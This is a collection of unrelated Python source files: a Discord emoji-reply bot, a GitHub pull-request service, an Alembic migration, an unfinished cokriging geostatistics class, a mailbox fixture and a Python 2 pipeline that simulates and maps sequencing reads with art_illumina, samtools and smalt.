TOKEN = os.getenv('DISCORD_TOKEN')
GUILD = os.getenv('DISCORD_GUILD')
client = discord.Client()
@client.event
async def on_ready():
for guild in client.guilds:
if guild.name == GUILD:
break
print(
f'{client.user} is connected to the following guild:\n'
f'{guild.name}(id: {guild.id})'
)
responses = ["🤬!?tRiGGerEd?!🤬", "pO👏dE👏fI👏nI👏cI👏jI", "💥😩💥😩💥😩", "🏃🎓🔥"]
@client.event
async def on_message(message):
lower = message.content.lower()
if "defacto" in lower or "de facto" in lower:
await message.channel.send(random.choice(responses))
client.run(TOKEN)
|
from typing import Dict, List
from github.PullRequest import PullRequest
from github.Repository import Repository
from ..config import LennyBotConfig
import requests
from github import Github
class GitHubService:
def __init__(self, config: LennyBotConfig):
self._config = config
self._token = self._config.github_token
self._github = None
if self._token is not None:
self._github = Github(self._token)
def fetch_latest_release(self, repository: str) -> Dict:
url = f"https://api.github.com/repos/{repository}/releases/latest"
response = requests.get(url, headers=self._headers())
if response.status_code != 200:
raise Exception(f"Unable to fetch latest version, Status: {response.status_code}, Content: {response.text}")
return response.json()
def fetch_tags(self, repository: str) -> List:
url = f"https://api.github.com/repos/{repository}/git/refs/tags"
response = requests.get(url, headers=self._headers())
if response.status_code != 200:
raise Exception(f"Unable to fetch latest version, Status: {response.status_code}, Content: {response.text}")
return response.json()
def create_pr(self, branch_name, title, body):
if self._github is None:
raise Exception("GitHub is not configured")
repo = self._github.get_repo(self._config.github_pr.repository)
new_pull = repo.create_pull(title, body, repo.default_branch , branch_name)
labels = self._get_or_create_labels(repo)
new_pull.add_to_labels(*labels)
pulls = self._find_own_pulls()
for pull in pulls:
if new_pull.id == pull.id:
continue
pull.as_issue().create_comment(f"Superseded by #{new_pull.number}")
pull.edit(state = "closed")
def _find_own_pulls(self)->List[PullRequest]:
repo = self._github.get_repo(self._config.github_pr.repository)
pulls = repo.get_pulls("open")
result = []
for pull in pulls:
if pull.head.ref.startswith(self._config.github_pr.branch_prefix):
result.append(pull)
return result
def _headers(self)->Dict:
headers = {}
if self._token is not None:
headers["Authorization"] = f"Bearer {self._token}"
return headers
def _get_or_create_labels(self, repo: Repository):
for label in repo.get_labels():
if label.name == "dependencies":
return [label]
label = repo.create_label("dependencies", "0366d6", "Pull requests that update a dependency file")
return [label] |
api_base = 'http://34.207.8.15:8080/api'
api_version = 'v1'
token = None
from samplify.resources import Publications
|
from .holding import HoldingAdminMessage # noqa: F401
from .lending import LendingAdminMessage # noqa: F401
|
from typing import Any, Type, TypeVar, cast
from ._from_native import from_native
from ._props import Props
from ._schema_facade import SchemaFacade
from ._schema_visitor import SchemaVisitor, SchemaVisitorReturnType
from ._version import version
from .representor import Representor
from .types import AnySchema, GenericSchema, Schema, optional
__version__ = version
__all__ = ("schema", "GenericSchema", "Props", "SchemaVisitor", "SchemaVisitorReturnType",
"from_native", "optional", "register_type", "represent",)
schema = SchemaFacade()
_representor = Representor()
_SchemaType = TypeVar("_SchemaType", bound=GenericSchema)
def register_type(name: str, schema_type: Type[_SchemaType]) -> _SchemaType:
assert issubclass(schema_type, Schema)
setattr(SchemaFacade, name, property(lambda self: schema_type()))
return cast(_SchemaType, getattr(schema, name))
def represent(self: GenericSchema, **kwargs: Any) -> str:
return self.__accept__(_representor, **kwargs)
def union(self: GenericSchema, other: Any) -> AnySchema:
return schema.any(self, other)
Schema.__override__("__repr__", represent)
Schema.__override__("__or__", union)
|
# -*- coding: utf-8 -*-
"""
A cokriging program for a points or blocks on a regular grid.
Created on Fri Dec 2 2016
"""
from __future__ import division, print_function, absolute_import
import json
from itertools import product
import time
from collections import namedtuple
import numpy as np
from scipy import linalg
import matplotlib.pyplot as plt
from super_block import SuperBlockSearcher
__author__ = "yuhao"
class Cokrige(object):
def __init__(self, param_file):
self.param_file = param_file
self._read_params()
self._check_params()
self.property_name = None
self.vr = None
self.rotmat = None
self.estimation = None
self.estimation_variance = None
self.xdb = None
self.ydb = None
self.zdb = None
self._2d = False
self.searcher = None
self.const = None
self._block_covariance = None
self._unbias = None
self.maxcov = None
self._mdt = None
self.resc = None
self.nst = list()
self.c0 = list()
self.it = list()
self.cc = list()
self.ang1 = list()
self.ang2 = list()
self.ang3 = list()
self.aa_hmax = list()
self.aa_hmin = list()
self.aa_vert = list()
def _read_params(self):
with open(self.param_file) as fin:
params = json.load(fin)
# data file definition
self.datafl = params['datafl'] #: 'testData/test.gslib',
self.nvr = params['nvar'] # number (primary + secondary)
self.ixl = params['icolx'] #: 1,
self.iyl = params['icoly'] #: 2,
self.izl = params['icolz']
self.ivrl = params['icolvr'] # list
# data limits
self.tmin = params['tmin'] #: -1.0e21,
self.tmax = params['tmax'] #: 1.0e21,
# collocated cokriging or not
self.icolloc = params['icolloc'] # boolean
# definition of collocated data file
self.secfl = params['secfl']
self.iclcol = params['iclcol']
self.idbg = params['idbg'] #: 3,
self.dbgfl = params['dbgfl'] #: 'kb2d.dbg',
self.outfl = params['outfl'] #: 'out.dat',
# Grid definition
self.nx = params['nx'] #: 50,
self.xmn = params['xmn'] #: 0.5,
self.xsiz = params['xsiz'] #: 1.0,
self.ny = params['ny'] #: 50,
self.ymn = params['ymn'] #: 0.5,
self.ysiz = params['ysiz'] #: 1.0,
self.nz = params['nz'] #: 50,
self.zmn = params['zmn'] #: 0.5,
self.zsiz = params['zsiz'] #: 1.0,
# discretization definition
self.nxdis = params['nxdis'] #: 1,
self.nydis = params['nydis'] #: 1,
self.nzdis = params['nzdis'] #: 1,
# maximum and minimum data points used in kriging
self.ndmin = params['ndmin'] # for both
self.ndmaxp = params['ndmaxp'] # primary
self.ndmaxs = params['ndmaxs'] # secondary
# search radii for primary variable
self.pradius_hmax = params['radius_hmax'] # scalar
self.pradius_hmin = params['radius_hmin'] # scalar
self.pradius_vert = params['radius_vert'] # scalar
# search radii for secondary variables
self.sradius_hmax = params['radius_hmax'] # scalar
self.sradius_hmin = params['radius_hmin'] # scalar
self.sradius_vert = params['radius_vert'] # scalar
# search ellipsoid
self.sang1 = params['sang1'] # scalar
self.sang2 = params['sang2'] # scalar
self.sang3 = params['sang3'] # scalar
# kriging type
self.ktype = params['ikrige']
# mean values for primary and secondary variables
self.vmean = params['mean'] # list
# Vairography definition
self.vario = params['vario'] # list of dictionaries
def _fill_check_covariance(self):
self.variography = [dict()] * self.nvr * self.nvr
for var in self.vario:
self.variography[(var['i']-1) * self.nvr + (var['j']-1)] = var
# try fill in symmetric covariance element
for i, j in product(range(self.nvr), range(self.nvr)):
idx1 = i + j * self.nvr
idx2 = j + i * self.nvr
if idx1 == {} and idx2 == {}:
raise ValueError("need variogram between {},{}".format(i, j))
elif idx1 == {}:
self.variography[idx1] = self.variography[idx2]
elif idx2 == {}:
self.variography[idx2] = self.variography[idx1]
for var in self.variography:
self.nst.append(var['nst'])
self.c0.append(var['c0'])
self.it.append(var['it'])
for idx in range(var['nst']):
self.cc.append(var['cc'][idx])
self.ang1.append(var['ang1'][idx])
self.ang2.append(var['ang2'][idx])
self.ang3.append(var['ang3'][idx])
self.aa_hmax.append(var['aa_hmax'][idx])
self.aa_hmin.append(var['aa_hmin'][idx])
self.aa_vert.append(var['aa_vert'][idx])
# check linear model of coregionalization
# check definite positiveness
def _check_params(self):
# Check search radius
if self.pradius_hmax <= 0:
raise ValueError("pradius_hmax should be larger than zero.")
if self.sradius_hmax <= 0:
raise ValueError("sradius_hmax should be larger than zero.")
# Check data file definition
if self.ixl < 0 and self.nx > 1:
raise ValueError("WARNING: ixl=0 and nx>1 !")
if self.iyl < 0 and self.ny > 1:
raise ValueError("WARNING: iyl=0 and ny>1 !")
if self.izl < 0 and self.nz > 1:
raise ValueError("WARNING: izl=0 and nz>1 !")
if self.ndmin <= 0:
raise ValueError("ndmin too small")
if self.ndmaxs/2 <= self.nvr and self.ktype == 2:
print('WARNING: with traditional ordinary cokriging the '+\
'sum of the weights applied to EACH secondary data'+\
'is zero. With ndmaxs set low and nvr large the'+\
'secondary data will not contribute to the estimate')
def read_data(self):
"Read a simplified Geo-EAS formatted file."
data_list = None
with open(self.datafl, 'r') as fin:
data_list = fin.readlines()
name = data_list[0].strip()
ncols = int(data_list[1].strip())
column_name = [item.strip() for item in data_list[2: ncols+2]]
self.property_name = [item for item in column_name
if item not in ['x', 'y', 'z']]
if 'z' not in column_name:
self._2d = True
column_name.append('z')
data_list = [tuple(item.strip().split() + ['0'])
for item in data_list[ncols+2:]]
else:
data_list = [tuple(item.strip().split())
for item in data_list[ncols+2:]]
data_dtype = np.dtype({
'names': column_name,
'formats': ['f8'] * len(column_name)})
self.vr = np.array(data_list, dtype=data_dtype)
def _preprocess(self):
"""create variables needed before performing kriging"""
# calculate dimensional constants
cokrige_const = namedtuple('Cokrige_const',
['PMX', 'MAXNST', 'MAXSB', 'MAXDIS',
'MAXSAM', 'UNEST', 'MAXVAR', 'MAXARG',
'MAXCOK'])
maxsbx = 1
if self.nx > 1:
maxsbx = int(self.nx/2)
if maxsbx > 50:
maxsbx = 50
maxsby = 1
if self.ny > 1:
maxsby = int(self.ny/2)
if maxsby > 50:
maxsby = 50
maxsbz = 1
if self.nz > 1:
maxsbz = int(self.nz/2)
if maxsbz > 50:
maxsbz = 50
self.const = cokrige_const(
PMX=999,
MAXNST=4,
MAXSB=(maxsbx, maxsby, maxsbz),
MAXDIS=self.nxdis * self.nydis * self.nzdis,
MAXSAM=self.ndmaxp + self.ndmaxs,
UNEST=np.nan,
MAXVAR=self.nvr,
MAXARG=self.nvr*self.nvr,
MAXCOK=(self.ndmaxp + self.ndmaxs)*self.nvr + self.nvr
)
# Calculate needed programing variables from input parameters
self.pradsqd = self.pradius_hmax * self.pradius_hmax
self.psanis1 = self.pradius_hmin / self.pradius_hmax
self.psanis2 = self.pradius_vert / self.pradius_hmax
self.sradsqd = self.sradius_hmax * self.sradius_hmax
self.ssanis1 = self.sradius_hmin / self.sradius_hmax
self.ssanis2 = self.sradius_vert / self.sradius_hmax
self.anis1 = np.array(self.aa_hmin) / \
np.maximum(self.aa_hmax, np.finfo(float).eps)
self.anis2 = np.array(self.aa_vert) / \
np.maximum(self.aa_hmax, np.finfo(float).eps)
self._fill_check_covariance()
def _set_rotation(self):
"""
Set up rotation matrix for both anisotropy and searching.
with self.rotmat being an array of 3*3 rotation matrix, the last matrix
in the array are the searching matrix
"""
ang1 = np.append(self.ang1, self.sang1)
ang2 = np.append(self.ang2, self.sang2)
ang3 = np.append(self.ang3, self.sang3)
anis1 = np.append(self.anis1, self.psanis1)
anis2 = np.append(self.anis2, self.psanis2)
anis1 = np.append(anis1, self.ssanis1)
anis2 = np.append(anis2, self.ssanis2)
self.rotmat = np.full((ang1.shape[0], 3, 3), np.nan)
def convert_ang1(ang):
if ang <= 0 and ang < 270:
alpha = np.deg2rad(90 - ang)
else:
alpha = np.deg2rad(450 - ang)
return alpha
v_convert = np.vectorize(convert_ang1)
alpha = v_convert(ang1)
beta = np.deg2rad(-ang2)
theta = np.deg2rad(ang3)
sina = np.sin(alpha)
sinb = np.sin(beta)
sint = np.sin(theta)
cosa = np.cos(alpha)
cosb = np.cos(beta)
cost = np.cos(theta)
afac1 = 1.0 / np.maximum(anis1, np.finfo(float).eps)
afac2 = 1.0 / np.maximum(anis2, np.finfo(float).eps)
self.rotmat[:, 0, 0] = cosb * cosa
self.rotmat[:, 0, 1] = cosb * sina
self.rotmat[:, 0, 2] = -sinb
self.rotmat[:, 1, 0] = afac1 * (-cost * sina + sint * sinb * cosa)
self.rotmat[:, 1, 1] = afac1 * (cost * cosa + sint * sinb * sina)
self.rotmat[:, 1, 2] = afac1 * (sint * cosb)
self.rotmat[:, 2, 0] = afac2 * (sint * sina + cost * sinb * cosa)
self.rotmat[:, 2, 1] = afac2 * (-sint * cosa + cost * sinb * sina)
self.rotmat[:, 2, 2] = afac2 * (cost * cosb)
def krige(self):
self._fill_check_covariance()
self._preprocess()
# Set up the rotation/anisotropy matrices needed for variogram
# and searching
self._set_rotation()
# compute maximum covariance for the rescaling factor:
self._max_covariance()
# Set up for super block searching:
print("Setting up Super Block Search...")
self._create_searcher()
# Set up discretization points per block
self._block_discretization()
# Find unbias value
self.unbias = self.maxcov
nxy = self.nx * self.ny
nloop = self.nx * self.ny * self.nz
print("Start working on the kriging...")
# time
t1 = time.time()
ts = 0
percent_od = 0
self.estimation = np.full((nloop,), np.nan)
self.estimation_variance = np.full((nloop,), np.nan)
# MAIN LOOP
for index in range(nloop):
self.iz = index // nxy
self.iy = (index - self.iz * nxy) // self.nx
self.ix = index - self.iz * nxy - self.iy * self.nx
xloc = self.xmn + self.ix * self.xsiz
yloc = self.ymn + self.iy * self.ysiz
zloc = self.zmn + self.iz * self.zsiz
# Search for proximity data
ts_1 = time.time()
self.searcher.search(xloc, yloc, zloc)
ts += time.time() - ts_1
# load nearest data in xa, ya, za, vra, vea
xa = list()
ya = list()
za = list()
vra = list()
iva = list() # which variable
npri = 0 # number of primary data
nsec = 0 # number of secondary data
na = 0 # number of both kinds
for i in range(self.searcher.nclose):
if npri == self.ndmaxp and nsec == self.ndmaxs:
continue
idx = self.searcher.close_samples[i]
# Load primary data
prim = self.vr[self.property_name[0]][idx]
if prim <= self.tmin and prim > self.tmax and \
npri < self.ndmaxp:
npri += 1
na += 1
xa.append(self.vr['x'][idx] - xloc)
ya.append(self.vr['y'][idx] - yloc)
za.append(self.vr['z'][idx] - zloc)
vra.append(prim)
iva.append(0)
# Load secondary data
sec1 = self.vr[self.property_name[1]][idx]
if sec1 <= self.tmin and sec1 > self.tmax and \
nsec < self.ndmaxs:
nsec += 1
na += 1
xa.append(self.vr['x'][idx] - xloc)
ya.append(self.vr['y'][idx] - yloc)
za.append(self.vr['z'][idx] - zloc)
if self.ktype != 2:
vra.append(sec1 - self.vmean[1] - self.vmean[0])
else:
vra.append(sec1)
iva.append(1)
sec2 = self.vr[self.property_name[2]][idx]
if sec2 <= self.tmin and sec2 > self.tmax and \
nsec < self.ndmaxs:
nsec += 1
na += 1
xa.append(self.vr['x'][idx] - xloc)
ya.append(self.vr['y'][idx] - yloc)
za.append(self.vr['z'][idx] - zloc)
if self.ktype != 2:
vra.append(sec1 - self.vmean[2] - self.vmean[0])
else:
vra.append(sec1)
iva.append(2)
sec3 = self.vr[self.property_name[3]][idx]
if sec3 <= self.tmin and sec3 > self.tmax and \
nsec < self.ndmaxs:
nsec += 1
na += 1
xa.append(self.vr['x'][idx] - xloc)
ya.append(self.vr['y'][idx] - yloc)
za.append(self.vr['z'][idx] - zloc)
if self.ktype != 2:
vra.append(sec1 - self.vmean[3] - self.vmean[0])
else:
vra.append(sec1)
iva.append(3)
est, estv = self._many_samples(xa, ya, za, vra, na)
self.estimation[index] = est
self.estimation_variance[index] = estv
# print working percentage
percent = np.round(index/nloop*100, decimals=0)
dtime = time.time() - t1
if percent != percent_od:
print("{}% ".format(percent) +\
"."*20 + "{}s elapsed.".format(np.round(dtime, decimals=3)))
percent_od = percent
print("Kriging Finished.")
print("Time used for searching: {}s".format(ts))
def _many_samples(self, xa, ya, za, vra, na):
if self.ktype == 0:
neq = na
elif self.ktype == 1:
neq = na + 1
elif self.ktype == 2:
neq = na + self.nvr
if (neq - na) > na or na < self.ndmin:
print("not enough data.")
return np.nan, np.nan
# left side
left = np.full((neq, neq), np.nan)
# fill the kriging matrix:
for i, j in product(range(na), range(na)):
if np.isnan(left[j, i]):
left[i, j] = self._cova3((xa[i], ya[i], za[i]),
(xa[j], ya[j], za[j]))
else:
left[i, j] = left[j, i]
@property
def block_covariance(self):
"return average covariance within block"
if self._block_covariance is None:
if self.ndb <= 1: # point kriging
self._block_covariance = self.unbias
else:
cov = list()
for x1, y1, z1 in zip(self.xdb, self.ydb, self.zdb):
for x2, y2, z2 in zip(self.xdb, self.ydb, self.zdb):
cov.append(self._cova3((x1, y1, z1), (x2, y2, z2)))
cov = np.array(cov).reshape((self.ndb, self.ndb))
cov[np.diag_indices_from(cov)] -= self.c0
self._block_covariance = np.mean(cov)
return self._block_covariance
def _block_discretization(self):
self.nxdis = 1 if self.nxdis < 1 else self.nxdis
self.nydis = 1 if self.nydis < 1 else self.nydis
self.nzdis = 1 if self.nzdis < 1 else self.nzdis
self.ndb = self.nxdis * self.nydis * self.nzdis
if self.ndb > self.const.MAXDIS:
raise ValueError("Too many discretization points")
xdis = self.xsiz / max(self.nxdis, 1)
ydis = self.ysiz / max(self.nydis, 1)
zdis = self.zsiz / max(self.nzdis, 1)
self.xdb = np.arange(0, self.nxdis, 1) * xdis + \
(-0.5 * self.xsiz + 0.5 * xdis)
self.ydb = np.arange(0, self.nydis, 1) * ydis + \
(-0.5 * self.ysiz + 0.5 * ydis)
self.zdb = np.arange(0, self.nzdis, 1) * zdis + \
(-0.5 * self.zsiz + 0.5 * zdis)
def _max_covariance(self):
'''
Calculate the maximum covariance value (used for zero distances and
for power model covariance):
'''
self.maxcov = self.c0
for ist in range(self.nst):
if self.it[ist] == 4:
self.maxcov += self.const.PMX
else:
self.maxcov += self.cc[ist]
def _create_searcher(self):
"Help create and initialize the searcher object"
self.searcher = SuperBlockSearcher()
# initialize required atrributes
# grid definition
self.searcher.nx = self.nx
self.searcher.xmn = self.xmn
self.searcher.xsiz = self.xsiz
self.searcher.ny = self.ny
self.searcher.ymn = self.ymn
self.searcher.ysiz = self.ysiz
self.searcher.nz = self.nz
self.searcher.zmn = self.zmn
self.searcher.zsiz = self.zsiz
# data
self.searcher.vr = self.vr
self.searcher.MAXSB = self.const.MAXSB
# rotation matrix
self.searcher.rotmat = self.rotmat[-1]
self.searcher.radsqd = self.radsqd
# octant search
self.searcher.noct = self.noct
# Setup
self.searcher.setup()
self.searcher.pickup()
# sort data according to superblock number
self.vr = self.vr[self.searcher.sort_index]
def _cova3(self, point1, point2, ivarg):
"""
Parameters
----------
point1, point2: tuple of 3
coordinates of two points
ivarg: 0, 1, 2, 3
0 for primary, 1,2,3 for secondary
Returns
-------
cova: scalar
covariance between (x1,y1,z1) and (x2,y2,z2)
"""
# Calculate the maximum covariance
istart = sum(self.nst[:ivarg])
cmax = self.c0[ivarg]
for iss in range(self.nst[ivarg]):
ist = istart + iss
if self.it[ist] == 4:
cmax += self.const.PMX
else:
cmax += self.cc[ist]
# check for 'zero' distance, return maxcov if so:
hsqd = self._sqdist(point1, point2, self.rotmat[istart])
if hsqd < np.finfo(float).eps:
cova = cmax
return cova
# loop over all structures
cova = 0
for ist in range(istart, self.nst[ivarg]):
if ist != 1:
hsqd = self._sqdist(point1, point2, self.rotmat[ist])
h = np.sqrt(hsqd)
if self.it[ist] == 1: # Spherical
hr = h / self.aa_hmax[ist]
if hr < 1:
cova += self.cc[ist] * (1 - hr * (1.5 - 0.5 * hr * hr))
elif self.it[ist] == 2: # Exponential
cova += self.cc[ist] * np.exp(-3.0 * h / self.aa_hmax[ist])
elif self.it[ist] == 3: # Gaussian
cova += self.cc[ist] * \
np.exp(-3.0 * (h / self.aa_hmax[ist]) *
(h/self.aa_hmax[ist]))
elif self.it[ist] == 4: # Power
cova += self.maxcov - self.cc[ist] * (h**(self.aa_hmax[ist]))
elif self.it[ist] == 5: # Hole Effect
cova += self.cc[ist] * np.cos(h / self.aa_hmax[ist] * np.pi)
return cova
def _sqdist(self, point1, point2, rotmat):
"""
This routine calculates the anisotropic distance between two points
given the coordinates of each point and a definition of the
anisotropy.
This method only consider a single anisotropy senario.
Parameters
----------
point1 : tuple
Coordinates of first point (x1,y1,z1)
point2 : tuple
Coordinates of second point (x2,y2,z2)
rotmat : 3*3 ndarray
matrix of rotation for this structure
Returns
-------
sqdist : scalar
The squared distance accounting for the anisotropy
and the rotation of coordinates (if any).
"""
dx = point1[0] - point2[0]
dy = point1[1] - point2[1]
dz = point1[2] - point2[2]
sqdist = 0.0
for i in range(3):
cont = rotmat[i, 0] * dx + \
rotmat[i, 1] * dy + \
rotmat[i, 2] * dz
sqdist += cont * cont
return sqdist
if __name__ == '__main__':
test_cokrige = Cokrige("testData/test_cokrige.par")
test_cokrige.read_data()
test_cokrige.krige()
|
"""add submission_id to PublishedAFA
Revision ID: 03257ae6000f
Revises: 4d66a8d6e11b
Create Date: 2017-10-26 09:57:31.577694
"""
# revision identifiers, used by Alembic.
revision = '03257ae6000f'
down_revision = '4d66a8d6e11b'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade(engine_name):
globals()["upgrade_%s" % engine_name]()
def downgrade(engine_name):
globals()["downgrade_%s" % engine_name]()
def upgrade_data_broker():
### commands auto generated by Alembic - please adjust! ###
op.add_column('published_award_financial_assistance', sa.Column('submission_id', sa.Numeric(), nullable=True))
op.create_index(op.f('ix_published_award_financial_assistance_submission_id'), 'published_award_financial_assistance', ['submission_id'], unique=False)
### end Alembic commands ###
def downgrade_data_broker():
### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_published_award_financial_assistance_submission_id'), table_name='published_award_financial_assistance')
op.drop_column('published_award_financial_assistance', 'submission_id')
### end Alembic commands ###
|
from unipath import Path
from lino.api import dd, rt
from lino_xl.lib.mailbox.models import get_new_mail
def objects():
Mailbox = rt.models.django_mailbox.Mailbox
mp = rt.settings.SITE.cache_dir.child("media", "mailbox")
rt.settings.SITE.makedirs_if_missing(mp)
dd.logger.info("Mailbox path is %s", mp)
for (protocol, name, origin) in dd.plugins.mailbox.mailbox_templates:
filename = mp.child(name)
origin.copy(filename)
yield Mailbox(
name=name,
uri=protocol + "://" + filename)
name = 'team.mbox'
origin = Path(__file__).parent.child(name)
filename = mp.child(name)
origin.copy(filename)
mbx = Mailbox(name=name, uri="mbox://" + filename)
yield mbx
get_new_mail()
|
__author__ = 'akoziol'
# Import the necessary modules
# OS is used for file/folder manipulations
import os
# Subprocess->call is used for making system calls
import subprocess
# Errno is used in the file creation command - I think it's similar to the $! variable in Perl
import errno
# Glob finds all the path names matching a specified pattern according to the rules used by the Unix shell
import glob
# Shutil is useful for file moving/copying
import shutil
# prints variables in a form which can be used as input to the interpreter - similar to Data::Dumper?
#import pprint
# Regex
import re
# System tools
import sys
# Can import date, and calculate length of run, etc.
import time
# Multiprocessing module
from multiprocessing import Pool
# Numerical python - used in the parsing of vcf files
import numpy
# Math module - used in the parsing of vcf files
import math
# Argument parser for user-inputted values, and a nifty help menu
from argparse import ArgumentParser
#Parser for arguments
parser = ArgumentParser(description='Perform modelling of parameters for GeneSipping')
parser.add_argument('-v', '--version', action='version', version='%(prog)s v1.0')
parser.add_argument('-i', '--input', required=True, help='Specify input directory')
parser.add_argument('-l', '--readLength', required=True, help='Specify list of read lengths to be used e.g. 18, 19, 20, 21, 22')
parser.add_argument('-f', '--foldCoverage', required=True, help='Specify list of fold coverage values to be used e.g. 1, 1.5, 2, 2.5, 5')
parser.add_argument('-k', '--kmerLength', required=True, help='Specify list of kmer lengths to be used e.g. 5, 7, 11')
# Get the arguments into a list
args = vars(parser.parse_args())
# Define variables from the arguments - there may be a more streamlined way to do this
path = args['input']
# Since the following three variables need to be lists, the string entered is split on the ,
readLength = args['readLength'].split(",")
foldCoverage = args['foldCoverage'].split(",")
kmer = args['kmerLength'].split(",")
# maxRL will be used in the fold coverage calculations during simulated file generation
maxRL = readLength[-1]
# Initialize the required dictionaries
vcfData = {}
# Target files are in scriptPath/targets
scriptPath = os.getcwd()
os.chdir("%s/targets" % scriptPath)
# Must have a .fa extension
targetFiles = glob.glob("*.fa")
# Add targets to appropriate list
targets = ["%s/targets/" % scriptPath + fastaFile for fastaFile in targetFiles]
# Genome reference files need to be in "path/reference"
os.chdir("%s/reference" % path)
# File extension needs to be .fa .fas .fasta, but not .ffn .fsa, etc.
referenceFile = glob.glob("*.fa*")
# Add all the reference to the references list
references = ["%s/reference/" % path + fastaFile for fastaFile in referenceFile]
# Define the path for the outputs
outPath = "%s/outputs" % path
def make_path(inPath):
"""from: http://stackoverflow.com/questions/273192/check-if-a-directory-exists-and-create-it-if-necessary \
does what is indicated by the URL"""
try:
os.makedirs(inPath)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
def createSimulatedFilesProcesses(reference):
"""Creates a pool of processes, and maps data in a parallel fashion to createSimulatedFiles"""
print "Creating simulated files"
# Initialise the args list
simulatedArgs = []
# Every Python module has its __name__ defined and if this is '__main__',
# it implies that the module is being run standalone by the user and we can do corresponding appropriate actions.
# http://ibiblio.org/g2swap/byteofpython/read/module-name.html
if __name__ == '__main__':
# Initialise the pool of processes - it defaults to the number of processors
simulatedFilepool = Pool()
# Create a tuple of the appropriate read lengths and fold coverages
# eg. (30, 1), (30, 2), ... (30, 100), (35, 1), (35, 2), ... (150, 100)
for rLength in readLength:
for fCov in foldCoverage:
simulatedArgs.append((rLength, fCov, reference))
# Use the map function and the tuple created above to process the data rapidly
simulatedFilepool.map(createSimulatedFiles, simulatedArgs)
def createSimulatedFiles((rLength, fCov, reference)):
"""Iterates over the readLength and foldCoverage lists to create folders (if necessary)\
and perform analyses"""
os.chdir(path)
# Create a new folder(if necessary) at the appropriate location
newPath = "%s/tmp/rL%s/rL%s_fC%s" % (path, rLength, rLength, fCov)
newFile = "%s/%s_%s" % (newPath, rLength, fCov)
# The adjusted coverage keeps the number of reads constant for each readLength value supplied.
# a modelling experiment with a readLength of 20 will have a adjCov that is 40% the value of
# one with a readLength of 50
adjCov = float(fCov) * float(rLength)/float(maxRL)
# If using Sakai as the reference, then multiplying the foldCoverage by the constant below
# will allow for the use of precise read lengths - using a foldCoverage value of 5 will yield almost
# exactly 500 000 reads
# adjCov = float(fCov) * 0.90935049 * float(rLength)/float(maxRL)
# Call art_illumina to simulate the reads into the appropriate folders - general format of system call:
# art_illumina -i /path-to-file/Escherichia_coli_O157_H7_str_Sakai.fas -l "readLength" -f "foldCoverage" \
# -m 225 -s 60 -o /path-to-folder/Appropriate_name
artIlluminaCall = "art_illumina -i %s -l %s -f %s -o %s" % (reference, rLength, adjCov, newFile)
# If not using an adjusted coverage value, then uncomment the line below
# artIlluminaCall = "art_illumina -i %s -l %s -f %s -o %s" % (reference, rLength, float(fCov), newFile)
make_path(newPath)
if not os.path.isfile("%s.fq" % newFile):
sys.stdout.write('.')
# Subprocess.call requires that the command be finished before the loop can continue
# this ensures that processes will not be started, and continue running, while the
# script believes that it is "safe" to start more processes, eventually leading to problems
subprocess.call(artIlluminaCall, shell=True, stdout=open(os.devnull, 'wb'), stderr=open(os.devnull, 'wb'))
else:
print sys.stdout.write('.')
def faidxTargetsProcesses():
"""Faidx multiprocessing helper function"""
print '\nProcessing targets with faidx'
# Initialise the args list
if __name__ == '__main__':
# Initialise the pool of processes - it defaults to the number of processors
faidxPool = Pool()
faidxPool.map(faidxTargets, targets)
def faidxTargets(file):
"""Creates .fai index files of the targets, which are necessary for the conversion
of sorted BAM files to fastq files."""
# print json.dumps(file, sort_keys=True, indent=4, separators=(',', ': '))
fileName = os.path.split(file)[1]
faidxFile = "%s.fai" % file
# print faidxFile
faidxPath = "%s/targets/faidxFiles" % path
make_path(faidxPath)
if not os.path.isfile("%s/%s.fai" % (faidxPath, fileName)):
faidxCommand = "samtools faidx %s" % file
subprocess.call(faidxCommand, shell=True, stdout=open(os.devnull, 'wb'), stderr=open(os.devnull, 'wb'))
# Move the file and faidx-processed file to the appropriate folder for further processing
shutil.move(faidxFile, faidxPath)
shutil.copy(file, faidxPath)
sys.stdout.write('.')
else:
sys.stdout.write('.')
def indexTargets():
"""Performs smalt index on the targets using the range of k-mers stored in the variable kmer"""
print '\nIndexing targets'
for target in targets:
for size in kmer:
# Format the target names properly
filename = os.path.split(target)[1]
fileNoExt = filename.split(".")[0]
# Create a new path to be created (if necessary) for the generation of the range of k-mers
indexPath = "%s/targets/%s/%s_%s" % (path, fileNoExt, fileNoExt, size)
# Call the make_path function to make folders as necessary
make_path(indexPath)
indexFileSMI = "%s.smi" % fileNoExt
indexFileSMA = "%s.sma" % fileNoExt
# Index the appropriate files
if not os.path.isfile("%s/%s" % (indexPath, indexFileSMI)):
indexCommand = "smalt index -k %s -s 1 %s %s/targets/faidxFiles/%s" % (size, fileNoExt, path, filename)
subprocess.call(indexCommand, shell=True, stdout=open(os.devnull, 'wb'), stderr=open(os.devnull, 'wb'))
shutil.move(indexFileSMI, indexPath)
shutil.move(indexFileSMA, indexPath)
sys.stdout.write('.')
else:
sys.stdout.write('.')
def mappingProcesses():
"""Mapping threads!"""
os.chdir(path)
print '\nPerforming reference mapping'
mappingProcessesArgs = []
if __name__ == '__main__':
mappingProcessesPool = Pool()
# uses kmer, targets, readLength, foldCoverage
for rLength in readLength:
for fCov in foldCoverage:
for target in targets:
for size in kmer:
mappingProcessesArgs.append((rLength, fCov, target, size))
mappingProcessesPool.map(mapping, mappingProcessesArgs)
def mapping((rLength, fCov, target, size)):
"""Performs the mapping of the simulated reads to the targets"""
filename = os.path.split(target)[1]
fileNoExt = filename.split(".")[0]
megaName = "rL%s_fC%s_%s_kmer%s" % (rLength, fCov, fileNoExt, size)
filePath = "%s/tmp/rL%s/rL%s_fC%s" % (path, rLength, rLength, fCov)
newPath = "%s/%s" % (filePath, megaName)
make_path(newPath)
targetPath = "%s/targets/%s/%s_%s" % (path, fileNoExt, fileNoExt, size)
# Map the files to the reference
if not os.path.isfile("%s/%s.bam" % (newPath, megaName)):
smaltMap = "smalt map -o %s/%s.bam -f bam -x %s/%s %s/%s_%s.fq" \
% (newPath, megaName, targetPath, fileNoExt, filePath, rLength, fCov)
subprocess.call(smaltMap, shell=True, stdout=open(os.devnull, 'wb'), stderr=open(os.devnull, 'wb'))
sys.stdout.write('.')
else:
sys.stdout.write('.')
def sortingProcesses():
"""Multiprocessing for sorting bam files"""
print "\nSorting bam files"
sortingProcessesArgs = []
if __name__ == '__main__':
sortingProcessesPool = Pool()
